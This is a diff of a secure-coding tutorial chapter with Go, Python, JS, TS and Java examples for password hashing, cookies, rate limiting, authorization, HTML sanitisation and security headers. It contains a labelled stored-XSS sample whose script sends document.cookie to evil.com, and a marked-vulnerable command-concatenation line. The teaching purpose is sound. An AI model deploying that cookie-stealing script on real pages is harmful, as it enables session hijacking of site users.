+import { promisify } from 'node:util'
+
+const run = promisify(execFile)
+
+// Types cannot tell a safe string from a dangerous one, but they CAN
+// make the shape of the safe call the only one available. A function
+// that takes `args: string[]` simply has nowhere to put a shell string.
+async function resize(inputPath: string, outputPath: string): Promise<void> {
+  await run('ffmpeg', [
+    '-i', inputPath,
+    '-vf', 'scale=800:600',
+    outputPath,
+  ])
+}
+
+// Worth saying plainly: argument separation stops SHELL injection, not
+// ARGUMENT injection. A filename beginning with "-" is still read by
+// ffmpeg as a flag. Validate the value as well as passing it safely:
+if (!/^[\w.-]+$/.test(userFilename) || userFilename.startsWith('-')) {
+  throw new Error('invalid filename')
+}
+```
+
+```java title="ProcessBuilder, safe"
+// VULNERABLE: the single-String form of Runtime.exec, and worse, any
+// version that hands the string to a shell.
+Runtime.getRuntime().exec("ffmpeg -i input.jpg -o " + userFilename);
+
+// SAFE: ProcessBuilder takes the program and each argument separately.
+// Java never invokes a shell here, so shell metacharacters are inert.
+ProcessBuilder pb = new ProcessBuilder(
+    "ffmpeg",
+    "-i", "input.jpg",
+    "-vf", "scale=800:600",
+    userFilename   // one argument, not shell code
+);
+pb.redirectErrorStream(true);
+Process process = pb.start();
+
+// Always consume the output stream and wait with a TIMEOUT. A process
+// whose pipe buffer fills up blocks forever, and waitFor() with no
+// timeout then hangs the calling thread for good.
+String output = new String(process.getInputStream().readAllBytes());
+if (!process.waitFor(30, TimeUnit.SECONDS)) {
+    process.destroyForcibly();
+}
 ```
 
 <Callout type="info">
@@ -259,8 +410,12 @@ General-purpose hash functions (SHA-256, MD5) are designed to be _fast_. A GPU c
 **Industry standard today:** use `Argon2id` (winner of the Password Hashing Competition). Fallback: bcrypt with cost factor >=12. Never use SHA-256, MD5, or SHA-1 for passwords.
 </Callout>
 
-```go
-Go / Argon2id (golang.org/x/crypto)import (
+Go Python JavaScript TypeScript Java
+
+a random salt per password, a deliberately slow hash, a constant-time compare
+
+```go title="Argon2id / golang.org/x/crypto"
+import (
     "crypto/rand"
     "golang.org/x/crypto/argon2"
     "encoding/base64"
@@ -290,6 +445,130 @@ func VerifyPassword(password, stored string) bool {
 }
 ```
 
+```python title="Argon2id / argon2-cffi"
+from argon2 import PasswordHasher
+from argon2.exceptions import VerifyMismatchError
+
+# The library owns the parameters, the salt and the encoding. That is
+# the point: every one of those is a chance to get it wrong by hand.
+ph = PasswordHasher(
+    time_cost=1,        # iterations
+    memory_cost=64*1024, # 64 MB
+    parallelism=4,
+    hash_len=32,
+)
+
+
+def hash_password(password: str) -> str:
+    # A random salt is generated internally and embedded in the output
+    # string, so there is nothing separate to store.
+    return ph.hash(password)  # -> $argon2id$v=19$m=65536,t=1,p=4$...
+
+
+def verify_password(password: str, stored: str) -> bool:
+    try:
+        ph.verify(stored, password)  # constant-time internally
+    except VerifyMismatchError:
+        return False
+
+    # Bonus: if the stored hash used weaker parameters than today's
+    # settings, transparently upgrade it on successful login.
+    if ph.check_needs_rehash(stored):
+        save_new_hash(ph.hash(password))
+
+    return True
+```
+
+```js title="Argon2id / node:crypto"
+import { randomBytes, scrypt, timingSafeEqual } from 'node:crypto'
+import { promisify } from 'node:util'
+import argon2 from 'argon2'
+
+// Argon2id, via the argon2 package. Salt, parameters and encoding are
+// all handled for you and embedded in the returned string.
+export async function hashPassword(password) {
+  return argon2.hash(password, {
+    type: argon2.argon2id,
+    timeCost: 1,
+    memoryCost: 64 * 1024, // 64 MB
+    parallelism: 4,
+  })
+}
+
+export async function verifyPassword(password, stored) {
+  // Constant-time internally; never compare hashes with ===
+  return argon2.verify(stored, password)
+}
+
+// If you cannot add a dependency, scrypt is in the standard library and
+// is an acceptable second choice. bcrypt is the third. What is NOT
+// acceptable is any general-purpose hash, crypto.createHash('sha256')
+// is fast by design, which is precisely the wrong property here.
+```
+
+```ts title="Argon2id / argon2"
+import argon2 from 'argon2'
+
+// A branded type is a small trick with a real payoff: a PasswordHash is
+// no longer interchangeable with any other string, so a function that
+// stores hashes cannot be handed a plaintext password by accident, and
+// a log statement that takes a `string` will not silently accept one.
+type PasswordHash = string & { readonly __brand: 'PasswordHash' }
+
+const OPTIONS = {
+  type: argon2.argon2id,
+  timeCost: 1,
+  memoryCost: 64 * 1024, // 64 MB
+  parallelism: 4,
+} as const
+
+export async function hashPassword(password: string): Promise<PasswordHash> {
+  return (await argon2.hash(password, OPTIONS)) as PasswordHash
+}
+
+export async function verifyPassword(
+  password: string,
+  stored: PasswordHash,
+): Promise<boolean> {
+  try {
+    return await argon2.verify(stored, password) // constant-time internally
+  } catch {
+    return false // a malformed stored hash must not throw into the handler
+  }
+}
+```
+
+```java title="Argon2id / Spring Security"
+// Spring Security ships the encoder, and using it rather than calling a
+// hashing library directly buys one specific thing: DelegatingPasswordEncoder
+// prefixes each hash with the algorithm that produced it, so you can
+// migrate from bcrypt to Argon2 without a flag day.
+@Bean
+PasswordEncoder passwordEncoder() {
+    // saltLength=16, hashLength=32, parallelism=4, memory=64MB, iterations=1
+    return new Argon2PasswordEncoder(16, 32, 4, 64 * 1024, 1);
+}
+
+@Service
+public class PasswordService {
+    private final PasswordEncoder encoder;
+
+    public String hashPassword(String password) {
+        // The random salt is generated internally and embedded in the output
+        return encoder.encode(password);
+    }
+
+    public boolean verifyPassword(String password, String stored) {
+        // Constant-time internally; never use String.equals on hashes,
+        // it short-circuits on the first differing byte and leaks timing.
+        return encoder.matches(password, stored);
+    }
+}
+
+// Argon2PasswordEncoder needs BouncyCastle on the classpath:
+//   implementation 'org.bouncycastle:bcprov-jdk18on'
+```
+
 06
 
 ## Sessions, Cookies & the Critical Flags
@@ -313,8 +592,12 @@ After a user authenticates, you need to remember them across requests. This is d
 | **Secure**   | `true`            | Cookie only sent over HTTPS              | Session stolen by Wi-Fi eavesdropper or Wireshark |
 | **SameSite** | `Strict` or `Lax` | Cookie not sent in cross-origin requests | CSRF attacks can use your cookie from evil.com    |
 
-```text
-Go / Secure Cookiehttp.SetCookie(w, &http.Cookie{
+Go Python JavaScript TypeScript Java
+
+HttpOnly, Secure, SameSite: three flags, three whole attack classes
+
+```go title="the secure cookie"
+http.SetCookie(w, &http.Cookie{
     Name:     "session_id",
     Value:    sessionID,
     HttpOnly: true,          // JS cannot access
@@ -323,6 +606,82 @@ Go / Secure Cookiehttp.SetCookie(w, &http.Cookie{
     MaxAge:   7 * 24 * 3600, // 7 days
     Path:     "/",
 })
+```
+
+```python title="the secure cookie"
+response.set_cookie(
+    key="session_id",
+    value=session_id,
+    httponly=True,      # JS cannot access
+    secure=True,        # HTTPS only
+    samesite="strict",  # no cross-site
+    max_age=7 * 24 * 3600,  # 7 days
+    path="/",
+)
+```
+
+```js title="the secure cookie"
+res.cookie('session_id', sessionId, {
+  httpOnly: true,   // JS cannot access
+  secure: true,     // HTTPS only
+  sameSite: 'strict', // no cross-site
+  maxAge: 7 * 24 * 3600 * 1000, // 7 days, in MILLISECONDS here
+  path: '/',
+})
+
+// Two Express-specific traps:
+//  1. maxAge is milliseconds, unlike the Set-Cookie header's seconds.
+//     Copying 604800 across gives you a ten-minute session.
+//  2. `secure: true` behind a reverse proxy needs app.set('trust proxy', 1),
+//     or Express sees plain HTTP and silently refuses to set the cookie.
+```
+
+```ts title="the secure cookie"
+import type { CookieOptions, Response } from 'express'
+
+// Defining the options ONCE, as a typed constant, is the point. Cookie
+// flags are set in several places (login, refresh, logout) and the one
+// that quietly omits `httpOnly` is the one that gets exploited.
+const SESSION_COOKIE: CookieOptions = {
+  httpOnly: true,     // JS cannot access, so an XSS cannot steal it
+  secure: true,       // HTTPS only, so it cannot leak in cleartext
+  sameSite: 'strict', // no cross-site, which is most of CSRF gone
+  maxAge: 7 * 24 * 3600 * 1000, // 7 days, in milliseconds
+  path: '/',
+}
+
+export function setSession(res: Response, sessionId: string): void {
+  res.cookie('session_id', sessionId, SESSION_COOKIE)
+}
+
+// Clearing must repeat the SAME path and flags, or the browser treats
+// it as a different cookie and the old one survives the logout.
+export function clearSession(res: Response): void {
+  res.clearCookie('session_id', { ...SESSION_COOKIE, maxAge: undefined })
+}
+```
+
+```java title="the secure cookie"
+ResponseCookie cookie = ResponseCookie.from("session_id", sessionId)
+    .httpOnly(true)       // JS cannot access
+    .secure(true)         // HTTPS only
+    .sameSite("Strict")   // no cross-site
+    .maxAge(Duration.ofDays(7))
+    .path("/")
+    .build();
+
+response.addHeader(HttpHeaders.SET_COOKIE, cookie.toString());
+
+// Use ResponseCookie, not the older javax/jakarta Cookie class: that one
+// has no SameSite setter at all, so code using it silently ships without
+// the flag that does most of the CSRF work.
+
+// With Spring Session the same thing is configuration rather than code:
+//   server.servlet.session.cookie:
+//     http-only: true
+//     secure: true
+//     same-site: strict
+//     max-age: 7d
 ```
 
 <Callout type="info">
@@ -383,8 +742,12 @@ Without rate limiting, an attacker can send millions of login attempts per secon
 <svg viewBox="0 0 680 200" xmlns="http://www.w3.org/2000/svg" width="100%"><rect width="680" height="200" fill="var(--dg-paper)"></rect><defs><marker id="rl" markerWidth="7" markerHeight="7" refX="5" refY="3" orient="auto"><path d="M0,0 L5,3 L0,6 Z" fill="var(--dg-ink-2)"></path></marker></defs><rect x="20" y="30" width="180" height="70" rx="8" fill="var(--dg-surface)" stroke="var(--dg-line)"></rect><text x="110" y="55" text-anchor="middle" fill="var(--dg-ink)" font-family="var(--font-ui)" font-size="12" font-weight="700">Layer 1: Per-IP</text><text x="110" y="73" text-anchor="middle" fill="var(--dg-ink-2)" font-family="var(--font-ui)" font-size="11">10 attempts / minute</text><text x="110" y="89" text-anchor="middle" fill="var(--dg-accent)" font-family="var(--font-ui)" font-size="10">Bypassed by botnets / rotating IPs</text><line x1="202" y1="65" x2="238" y2="65" stroke="var(--dg-ink-2)" stroke-width="1.5" marker-end="url(#rl)"></line><rect x="240" y="30" width="200" height="70" rx="8" fill="var(--dg-surface)" stroke="var(--dg-line)"></rect><text x="340" y="55" text-anchor="middle" fill="var(--dg-ink)" font-family="var(--font-ui)" font-size="12" font-weight="700">Layer 2: Per-Account</text><text x="340" y="73" text-anchor="middle" fill="var(--dg-ink-2)" font-family="var(--font-ui)" font-size="11">5 failures -> lock 24h</text><text x="340" y="89" text-anchor="middle" fill="var(--dg-accent)" font-family="var(--font-ui)" font-size="10">Bypassed by password spray</text><line x1="442" y1="65" x2="478" y2="65" stroke="var(--dg-ink-2)" stroke-width="1.5" marker-end="url(#rl)"></line><rect x="480" y="30" width="180" height="70" rx="8" fill="var(--dg-ok-surface)" stroke="var(--dg-ok)"></rect><text x="570" y="55" text-anchor="middle" fill="var(--dg-ink)" font-family="var(--font-ui)" font-size="12" font-weight="700">Layer 3: Global</text><text x="570" y="73" text-anchor="middle" fill="var(--dg-ink-2)" font-family="var(--font-ui)" font-size="11">100 failures / min system-wide</text><text x="570" y="89" text-anchor="middle" fill="var(--dg-ok)" font-family="var(--font-ui)" font-size="10">Alert + CAPTCHA all users</text><rect x="20" y="130" width="640" height="46" rx="8" fill="var(--dg-warn-surface)" stroke="var(--dg-warn)"></rect><text x="340" y="152" text-anchor="middle" fill="var(--dg-accent)" font-family="var(--font-ui)" font-size="12" font-weight="700">Password Spray Attack</text><text x="340" y="168" text-anchor="middle" fill="var(--dg-ink-2)" font-family="var(--font-ui)" font-size="11">Try one common password ("123456") across millions of accounts -> avoids per-account lockout. Only global rate limiting catches this.</text></svg>
 </Diagram>
 
-```go
-Go / Rate Limiting with golang.org/x/time/rateimport (
+Go Python JavaScript TypeScript Java
+
+a token bucket per IP, checked before the handler runs
+
+```go title="rate limiting / golang.org/x/time/rate"
+import (
     "golang.org/x/time/rate"
     "sync"
     "net/http"
@@ -419,6 +782,120 @@ func RateLimitMiddleware(next http.Handler) http.Handler {
 }
 ```
 
+```python title="rate limiting / slowapi"
+from slowapi import Limiter, _rate_limit_exceeded_handler
+from slowapi.errors import RateLimitExceeded
+from slowapi.util import get_remote_address
+
+limiter = Limiter(key_func=get_remote_address)
+app.state.limiter = limiter
+app.add_exception_handler(RateLimitExceeded, _rate_limit_exceeded_handler)
+
+
+# The strictest limit belongs on the endpoints an attacker actually
+# targets: login, password reset, signup. A global limit generous enough
+# for browsing is far too generous for credential stuffing.
+@app.post("/login")
+@limiter.limit("5/minute")
+async def login(request: Request, body: LoginRequest):
+    ...
+
+
+# For a multi-instance deployment, back it with Redis so the limit is
+# shared rather than per-process:
+#   Limiter(key_func=get_remote_address, storage_uri="redis://localhost:6379")
+```
+
+```js title="rate limiting / express-rate-limit"
+import rateLimit from 'express-rate-limit'
+import RedisStore from 'rate-limit-redis'
+
+const loginLimiter = rateLimit({
+  windowMs: 60_000, // 1 minute
+  limit: 5,         // 5 attempts per IP per window
+  standardHeaders: 'draft-7', // RateLimit-* response headers
+  legacyHeaders: false,
+
+  // Without a shared store this is PER PROCESS: five instances means
+  // five times the limit, and an attacker only has to be unlucky once.
+  store: new RedisStore({ sendCommand: (...args) => redis.sendCommand(args) }),
+})
+
+app.post('/login', loginLimiter, loginHandler)
+
+// Behind a proxy, set app.set('trust proxy', 1) so req.ip is the real
+// client and not the load balancer, otherwise every request shares one
+// bucket and the limiter takes your whole site down instead.
+```
+
+```ts title="rate limiting / express-rate-limit"
+import rateLimit, { type Options } from 'express-rate-limit'
+
+// Three tiers, declared as data. The reason to write it this way is that
+// the numbers become reviewable in one place: it is very easy to protect
+// /login carefully and leave /password-reset on the global limit.
+const TIERS = {
+  global: { windowMs: 60_000, limit: 100 },
+  auth: { windowMs: 60_000, limit: 5 },
+  expensive: { windowMs: 60_000, limit: 10 },
+} as const satisfies Record<string, Pick<Options, 'windowMs' | 'limit'>>
+
+function limiter(tier: keyof typeof TIERS) {
+  return rateLimit({
+    ...TIERS[tier],
+    standardHeaders: 'draft-7',
+    legacyHeaders: false,
+    store: new RedisStore({ sendCommand: (...a: string[]) => redis.sendCommand(a) }),
+    // Key by ACCOUNT as well as IP on auth routes. An attacker spraying
+    // one password across many accounts from many IPs defeats a pure
+    // per-IP limit entirely, which is how credential stuffing works.
+    keyGenerator: (req) =>
+      tier === 'auth' ? `${req.ip}:${String(req.body?.email ?? '')}` : (req.ip ?? 'unknown'),
+  })
+}
+
+app.use(limiter('global'))
+app.post('/login', limiter('auth'), loginHandler)
+app.post('/password-reset', limiter('auth'), resetHandler)
+```
+
+```java title="rate limiting / Bucket4j"
+// Bucket4j is a token bucket, the same algorithm as the Go tab, and it
+// has a Redis-backed mode so the limit is shared across instances.
+@Component
+public class RateLimitFilter extends OncePerRequestFilter {
+    private final Map<String, Bucket> buckets = new ConcurrentHashMap<>();
+
+    // Per-IP: 5 requests per second, burst of 10
+    private Bucket newBucket() {
+        return Bucket.builder()
+            .addLimit(limit -> limit.capacity(10).refillGreedy(5, Duration.ofSeconds(1)))
+            .build();
+    }
+
+    @Override
+    protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
+                                    FilterChain chain)
+            throws ServletException, IOException {
+        String ip = clientIp(req);
+        Bucket bucket = buckets.computeIfAbsent(ip, k -> newBucket());
+
+        if (!bucket.tryConsume(1)) {
+            res.setHeader("Retry-After", "1");
+            res.sendError(429, "too many requests");
+            return; // the controller never runs
+        }
+
+        chain.doFilter(req, res);
+    }
+}
+
+// The in-memory map above has the same flaw the Go tab does, and it is
+// worth naming: nothing ever removes entries, so it grows with every
+// distinct IP until the process runs out of heap. Use an eviction cache
+// (Caffeine with expireAfterAccess) or a Redis-backed proxy manager.
+```
+
 09
 
 ## Authorization Vulnerabilities: BOLA & BFLA
@@ -439,8 +916,8 @@ _(Also called IDOR, Insecure Direct Object Reference)_
 
 User A can access, modify, or delete the resources of User B by guessing or iterating their IDs.
 
-```sql
-SQL / BOLA Fix--VULNERABLE: fetches invoice 5 regardless of who is asking
+```sql title="the BOLA fix"
+--VULNERABLE: fetches invoice 5 regardless of who is asking
 SELECT * FROM invoices WHERE id = $1
 
 -- FIXED: also requires the invoice to belong to the requesting user
@@ -461,8 +938,12 @@ Return **404 Not Found** (not 403 Forbidden) when a user requests a resource the
 
 A regular user accesses admin-only endpoints because role checks are missing at the routing layer. Believing "nobody knows the /admin URL" is **security through obscurity**: which is not security at all.
 
-```go
-Go / Role Middlewarefunc RequireRole(role string) func(http.Handler) http.Handler {
+Go Python JavaScript TypeScript Java
+
+the check lives in middleware, so no handler can forget it
+
+```go title="the role middleware"
+func RequireRole(role string) func(http.Handler) http.Handler {
     return func(next http.Handler) http.Handler {
         return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
             user, ok := r.Context().Value("user").(User)
@@ -478,6 +959,112 @@ Go / Role Middlewarefunc RequireRole(role string) func(http.Handler) http.Handle
 // Router setup
 r.With(RequireAuth, RequireRole("admin")).
   Get("/admin/invoices", adminInvoicesHandler)
+```
+
+```python title="the role dependency"
+from fastapi import Depends, HTTPException
+
+
+def require_role(role: str):
+    def checker(user: User = Depends(get_current_user)) -> User:
+        if user.role != role:
+            raise HTTPException(403, "forbidden")
+        return user
+    return checker
+
+
+# Router setup: the dependency runs BEFORE the handler body
+@app.get("/admin/invoices")
+async def admin_invoices(user: User = Depends(require_role("admin"))):
+    return await fetch_all_invoices()
+```
+
+```js title="the role middleware"
+export function requireRole(role) {
+  return (req, res, next) => {
+    const user = req.context?.user
+    if (!user || user.role !== role) {
+      return res.status(403).send('forbidden') // short-circuit
+    }
+    next()
+  }
+}
+
+// Router setup
+app.get('/admin/invoices', requireAuth, requireRole('admin'), adminInvoicesHandler)
+
+// The failure mode to design against is not a broken check, it is a
+// MISSING one: a new admin route added next month without the
+// middleware. Mounting the guard on the router rather than per route
+// makes forgetting it structurally impossible:
+//   const admin = Router()
+//   admin.use(requireAuth, requireRole('admin'))
+//   admin.get('/invoices', adminInvoicesHandler)
+//   app.use('/admin', admin)
+```
+
+```ts title="the role middleware"
+import { Router, type NextFunction, type Request, type Response } from 'express'
+
+type Role = 'admin' | 'user'
+
+// A union rather than `string` means requireRole('admni') does not
+// compile. A typo in a role name otherwise fails OPEN in the worst way:
+// nobody matches, so nobody gets in, until someone "fixes" it by
+// loosening the check.
+export function requireRole(role: Role) {
+  return (req: Request, res: Response, next: NextFunction): void => {
+    const user = req.context?.user
+    if (!user || user.role !== role) {
+      res.status(403).send('forbidden')
+      return
+    }
+    next()
+  }
+}
+
+// Mount the guard on the ROUTER, so every route under /admin inherits
+// it and a future route cannot be added without one.
+const admin = Router()
+admin.use(requireAuth, requireRole('admin'))
+admin.get('/invoices', adminInvoicesHandler)
+
+app.use('/admin', admin)
+```
+
+```java title="method security"
+// Spring Security expresses this as an annotation on the method, checked
+// by a proxy before the body runs.
+@Configuration
+@EnableMethodSecurity
+class SecurityConfig { }
+
+@RestController
+class AdminController {
+
+    @PreAuthorize("hasRole('ADMIN')")
+    @GetMapping("/admin/invoices")
+    List<Invoice> adminInvoices() {
+        return invoiceService.findAll();
+    }
+}
+
+// Better still, put it in the filter chain so the rule covers the whole
+// URL space rather than one method at a time. A route added later under
+// /admin/** is then protected the moment it exists:
+@Bean
+SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
+    return http
+        .authorizeHttpRequests(auth -> auth
+            .requestMatchers("/admin/**").hasRole("ADMIN")
+            .requestMatchers("/login", "/signup").permitAll()
+            .anyRequest().authenticated())   // deny by default, always
+        .build();
+}
+
+// `.anyRequest().authenticated()` is the line that matters most: it
+// makes the policy deny-by-default, so forgetting a rule for a new
+// endpoint locks it down rather than exposing it.
 ```
 
 ### The Horizontal vs Vertical Mental Model
@@ -520,8 +1107,8 @@ JavaScript running in your platform's context can:
 
 A user submits a comment/post containing a `<script>` tag. Your server stores it. Every user who views that post has the script execute in their browser.
 
-```text
-Stored XSS Attack<!-- Attacker submits this as a "comment" -->
+```html title="the stored XSS attack"
+<!-- Attacker submits this as a "comment" -->
 <script>
   // Steal session cookie and send to attacker's server
   fetch('https://evil.com/steal?c=' + document.cookie);
@@ -537,8 +1124,36 @@ Stored XSS Attack<!-- Attacker submits this as a "comment" -->
 
 Before storing any user-provided HTML/markdown, strip dangerous tags and attributes. Use a battle-tested library; never write your own sanitiser.
 
-```python
-Python / bleach sanitisationimport bleach
+Go Python JavaScript TypeScript Java
+
+an allow-list of tags, never a block-list of dangerous ones
+
+```go title="bluemonday sanitisation"
+import "github.com/microcosm-cc/bluemonday"
+
+// Build the policy ONCE at startup, not per request: compiling it is
+// the expensive part and the policy is safe to share.
+var commentPolicy = func() *bluemonday.Policy {
+    p := bluemonday.NewPolicy()
+    p.AllowElements("p", "b", "i", "em", "strong", "ul", "ol", "li")
+    p.AllowAttrs("href").OnElements("a")
+    // Without this, href="javascript:..." survives the tag allow-list
+    // and you have an XSS through a link.
+    p.RequireParseableURLs(true)
+    p.AllowURLSchemes("http", "https", "mailto")
+    return p
+}()
+
+func SanitiseComment(rawHTML string) string {
+    return commentPolicy.Sanitize(rawHTML)
+}
+
+// bluemonday.UGCPolicy() is a ready-made policy for user-generated
+// content and is a reasonable default if you do not want to enumerate.
+```
+
+```python title="bleach sanitisation"
+import bleach
 
 ALLOWED_TAGS = ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li']
 ALLOWED_ATTRS = {'a': ['href']}
@@ -557,12 +1172,83 @@ def sanitise_comment(raw_html: str) -> str:
 # <img onerror="..."> -> attribute stripped
 ```
 
+```js title="DOMPurify sanitisation"
+import createDOMPurify from 'dompurify'
+import { JSDOM } from 'jsdom'
+
+// DOMPurify needs a DOM. On the server, JSDOM provides one.
+const DOMPurify = createDOMPurify(new JSDOM('').window)
+
+const ALLOWED_TAGS = ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li']
+const ALLOWED_ATTR = ['href']
+
+export function sanitiseComment(rawHtml) {
+  return DOMPurify.sanitize(rawHtml, { ALLOWED_TAGS, ALLOWED_ATTR })
+}
+
+// Do NOT write your own with a regex. HTML parsing is adversarial:
+// <img src=x onerror=alert(1)>, <svg/onload=...>, malformed tags that
+// browsers helpfully repair into working script. Every hand-rolled
+// "strip tags" function in history has been bypassed.
+```
+
+```ts title="DOMPurify sanitisation"
+import createDOMPurify from 'dompurify'
+import { JSDOM } from 'jsdom'
+
+const DOMPurify = createDOMPurify(new JSDOM('').window)
+
+// A branded type again, and here it earns its keep more than anywhere
+// else in this chapter: SafeHtml can only be produced by the sanitiser,
+// so a template that renders raw HTML can demand one and the compiler
+// will refuse any string that has not been through it.
+type SafeHtml = string & { readonly __brand: 'SafeHtml' }
+
+const CONFIG = {
+  ALLOWED_TAGS: ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li'],
+  ALLOWED_ATTR: ['href'],
+} as const
+
+export function sanitiseComment(rawHtml: string): SafeHtml {
+  return DOMPurify.sanitize(rawHtml, CONFIG) as SafeHtml
+}
+
+// render(html: SafeHtml) now cannot be called with req.body.comment,
+// which is the mistake this whole section exists to prevent.
+```
+
+```java title="OWASP Java HTML Sanitizer"
+import org.owasp.html.HtmlPolicyBuilder;
+import org.owasp.html.PolicyFactory;
+
+public final class CommentSanitiser {
+
+    // Built once; PolicyFactory is immutable and thread-safe.
+    private static final PolicyFactory POLICY = new HtmlPolicyBuilder()
+        .allowElements("p", "b", "i", "em", "strong", "ul", "ol", "li")
+        .allowElements("a")
+        .allowAttributes("href").onElements("a")
+        // Restrict the URL schemes, or href="javascript:..." gets through
+        .allowUrlProtocols("http", "https", "mailto")
+        .requireRelNofollowOnLinks()
+        .toFactory();
+
+    public static String sanitise(String rawHtml) {
+        return POLICY.sanitize(rawHtml);
+    }
+}
+
+// Thymeleaf and JSP escape by default on output, which is the other half
+// of the defence. The rule across all five tabs is the same: sanitise on
+// the way IN if you must store HTML, and escape on the way OUT always.
+```
+
 ### Content Security Policy (CSP): Last Line of Defence
 
 CSP is an HTTP response header that tells the browser _exactly_ which scripts are allowed to run. Even if an attacker injects a `<script>` tag, the browser blocks it if it violates the policy.
 
-```text
-HTTP Header / CSP# Only load scripts from your own domain. Block all inline scripts.
+```http title="the CSP header"
+# Only load scripts from your own domain. Block all inline scripts.
 Content-Security-Policy: default-src 'self';
                          script-src 'self';
                          object-src 'none';
@@ -601,8 +1287,8 @@ The most catastrophically common mistake: API keys, database passwords, JWT secr
 **If you accidentally commit a secret to Git, immediately rotate/revoke it.** Deleting the file in a new commit does not remove it from history. Assume the secret is compromised the moment it touched a remote repository.
 </Callout>
 
-```text
-Shell / Pre-commit hook with gitleaks# Install: brew install gitleaks
+```bash title="pre-commit hook with gitleaks"
+# Install: brew install gitleaks
 # .git/hooks/pre-commit
 gitleaks protect --staged --no-git -v
 # Blocks commit if API keys, passwords, tokens detected in staged files
@@ -616,8 +1302,12 @@ In development, log level is typically `DEBUG`, full stack traces, SQL queries, 
 - File paths and function names -> reveals codebase structure.
 - User PII accidentally logged -> GDPR violation + breach liability.
 
-```go
-Go / Environment-aware log levelimport "log/slog"
+Go Python JavaScript TypeScript Java
+
+debug in development, info in production, and never the request body
+
+```go title="environment-aware log level"
+import "log/slog"
 
 func setupLogger() {
     level := slog.LevelInfo  // default: production
@@ -627,6 +1317,93 @@ func setupLogger() {
     slog.SetDefault(slog.New(slog.NewJSONHandler(os.Stdout,
         &slog.HandlerOptions{Level: level})))
 }
+```
+
+```python title="environment-aware log level"
+import logging
+import os
+
+
+def setup_logger() -> None:
+    level = logging.INFO  # default: production
+    if os.getenv("APP_ENV") == "development":
+        level = logging.DEBUG
+
+    logging.basicConfig(level=level, format="%(message)s")
+
+    # Third-party libraries are the usual leak: SQLAlchemy's engine
+    # logger prints every query WITH its bound parameters at DEBUG,
+    # which in production means passwords and tokens in your log
+    # aggregator. Pin the noisy ones explicitly.
+    logging.getLogger("sqlalchemy.engine").setLevel(logging.WARNING)
+    logging.getLogger("httpx").setLevel(logging.WARNING)
+```
+
+```js title="environment-aware log level"
+import pino from 'pino'
+
+export const log = pino({
+  // default: production
+  level: process.env.APP_ENV === 'development' ? 'debug' : 'info',
+
+  // Redaction is the part that matters here. A debug log of `req` is an
+  // enormous object, and it contains the Authorization header and the
+  // password field of the body you were trying to inspect.
+  redact: [
+    'req.headers.authorization',
+    'req.headers.cookie',
+    '*.password',
+    '*.token',
+    '*.apiKey',
+  ],
+})
+```
+
+```ts title="environment-aware log level"
+import pino, { type Level } from 'pino'
+
+type Env = 'development' | 'staging' | 'production'
+
+const LEVELS: Record<Env, Level> = {
+  development: 'debug', // everything
+  staging: 'info',
+  production: 'info',   // never debug in production
+}
+
+const env = (process.env.APP_ENV ?? 'production') as Env
+//                                   ^ default to the SAFE value. A
+//                                     missing variable must not turn
+//                                     debug logging on in production.
+
+export const log = pino({
+  level: LEVELS[env],
+  redact: ['req.headers.authorization', 'req.headers.cookie',
+           '*.password', '*.token', '*.apiKey'],
+})
+```
+
+```java title="environment-aware log level"
+// Configuration, not code, and driven by the Spring profile:
+//
+//   <configuration>
+//     <springProfile name="production">
+//       <root level="INFO"/>
+//       <!-- These two are the ones that leak. Hibernate's parameter
+//            binder logs every bound value, which is every password
+//            you ever hashed and every token you ever stored. -->
+//       <logger name="org.hibernate.SQL" level="WARN"/>
+//       <logger name="org.hibernate.orm.jdbc.bind" level="WARN"/>
+//       <logger name="org.springframework.web" level="WARN"/>
+//     </springProfile>
+//
+//     <springProfile name="default">
+//       <root level="DEBUG"/>
+//     </springProfile>
+//   </configuration>
+
+// And explicitly OFF in production, because both print request bodies:
+//   spring.jpa.show-sql: false
+//   server.error.include-stacktrace: never
 ```
 
 ### (3) Security Headers
@@ -641,8 +1418,12 @@ A single middleware call adds all industry-standard security headers. Every majo
 | `Strict-Transport-Security`       | Forces HTTPS, prevents SSL stripping                    |
 | `Referrer-Policy`                 | Controls how much referrer info is sent cross-origin    |
 
-```text
-Go / Secure Headers Middleware (chi/middleware)import "github.com/go-chi/chi/v5/middleware"
+Go Python JavaScript TypeScript Java
+
+set them once, in middleware, for every response
+
+```go title="secure headers middleware / chi"
+import "github.com/go-chi/chi/v5/middleware"
 
 r.Use(middleware.SetHeader("X-Frame-Options", "DENY"))
 r.Use(middleware.SetHeader("X-Content-Type-Options", "nosniff"))
@@ -653,6 +1434,102 @@ r.Use(middleware.SetHeader(
 r.Use(middleware.SetHeader(
     "Content-Security-Policy",
     "default-src 'self'; script-src 'self'; object-src 'none'"))
+```
+
+```python title="secure headers middleware"
+from starlette.middleware.base import BaseHTTPMiddleware
+
+HEADERS = {
+    "X-Frame-Options": "DENY",
+    "X-Content-Type-Options": "nosniff",
+    "Referrer-Policy": "strict-origin-when-cross-origin",
+    "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
+    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
+}
+
+
+class SecurityHeaders(BaseHTTPMiddleware):
+    async def dispatch(self, request, call_next):
+        response = await call_next(request)
+        response.headers.update(HEADERS)
+        return response
+
+
+app.add_middleware(SecurityHeaders)
+```
+
+```js title="helmet"
+import helmet from 'helmet'
+
+// helmet() sets sensible defaults for all of these and more, in one line
+app.use(helmet({
+  contentSecurityPolicy: {
+    directives: {
+      defaultSrc: ["'self'"],
+      scriptSrc: ["'self'"],
+      objectSrc: ["'none'"],
+    },
+  },
+  strictTransportSecurity: {
+    maxAge: 63_072_000,
+    includeSubDomains: true,
+    preload: true,
+  },
+  referrerPolicy: { policy: 'strict-origin-when-cross-origin' },
+}))
+
+// Worth knowing what helmet does NOT do: it will not set HSTS on a
+// plain-HTTP response, so behind a proxy you still need
+// app.set('trust proxy', 1) for the header to appear at all.
+```
+
+```ts title="helmet"
+import helmet, { type HelmetOptions } from 'helmet'
+
+// Pinning the options in a typed constant means a directive removed by
+// a careless edit is visible in review rather than silently absent, and
+// a misspelled directive name fails the build.
+const SECURITY: HelmetOptions = {
+  contentSecurityPolicy: {
